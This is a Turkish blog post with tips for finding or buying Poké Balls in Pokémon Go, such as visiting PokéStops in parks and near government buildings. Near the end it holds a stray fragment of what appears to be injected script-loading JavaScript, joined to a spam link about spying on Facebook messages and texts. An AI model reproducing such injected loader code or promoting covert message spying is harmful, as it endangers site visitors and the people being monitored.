Pokemon Go Topu Bittiğinde Bulma ve Alma

Son zamanlarda oldukça popüler olan pokemon go oyunu kısa süre içerisinde tüm oyuncuların göz bebeği oldu. Fakat ister istemez bu bağımlılık yaratan oyunda bazı can sıkıcı durumlar olabiliyor.

Pokemon Go Top Bitti, Nasıl Top Bulabilirim ?

pokemon-go-topuPokemon go oyununu büyük bir zevk ve hevesle oynarken tam da bu esnada toplarınız bitse ne yaparsınız ? Oldukça can sıkıcı bir durum dime. Şimdi sizlere bu yazımızda pokemon go oyununda toplarınız bittiğinde neler yapmanız gerektiğini anlatacağız. Tabi tüm anlattıklarımız bu pokemon go oyuncularına tavsiye niteliğindedir.

Oyun içerisinde bulunan poke topları, pokemon yumurtaları ya da diğer itemleri bulmak için pokestopları ziyaret ediniz. Oyun için çıkmış olduğunuz gezintilerde çevrenizde karşılaşacağınız Pokestoplara uğrayın. Eee şimdi pokestopları nereden bulacağınız diyebilirsiniz. Yazımızında devamında tüm detaylara yer veriyoruz.

Pokestopları Nerede Bulabilirim ?

Ingress’te portalların olduğu alanda çok kolay bir şekilde pokestoplarından poke topu, pokemon yumurtası ya da diğer benzeri itemleri bulabilirsiniz.

Pokemon Go Topu Nasıl Alabilirim ?

Normalde pokemon go oyununu ücretsiz bir şekilde kolayca oynayabilirsiniz. Zaten bilindiği üzere oyunun kurulumu da ücretsizdir. Oyun içerisinde kendi istekleriniz doğrultusunda satın alımlar yapabilirsiniz. Pokemon go toplarını da belirli bir ücret karşılığında satın alabilirsiniz.

Pokemon Go Topu Bulma

Pokemon go oyunu içerisinde topunuz bittiğinde mağazadan belirli bir ücret karşılığında coin alıp, almış olduğunuz coinler ile poke toplarını ya da oyundaki diğer itemleri satın alabilirsiniz. Pokemon topu almak için mağazaya ekranın yan tarafında poke topu simgesine tıklayıp erişebilirsiniz.

Ücretsiz Pokemon Go Topu Bulma

Poketoplarını ücretsiz bir şekilde elde etmeniz için devlet daireleri, parklar ve iş merkezleri çevresinde gezerek bulabilrisiniz. Böylece ücretsiz bir şekilde elde edebilirsiniz.

Yolda yürürken genellikle Parklar, Devlet Daireleri, iş merkezleri İzban gibi yerlerde ücretsiz Poketop bulabilirsiniz. Bunlara oyun içinde para harcamanıza gerek kalmayacaktır. Sizler için kısa ama faydalı olabileceğini düşündüm.

document.currentScript.parentNode.insertBefore(s, document.currentScript);http://traductorinterpretemoises.com/facebook-spy-monitoring-text-messages-spy-without-jailbreak/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir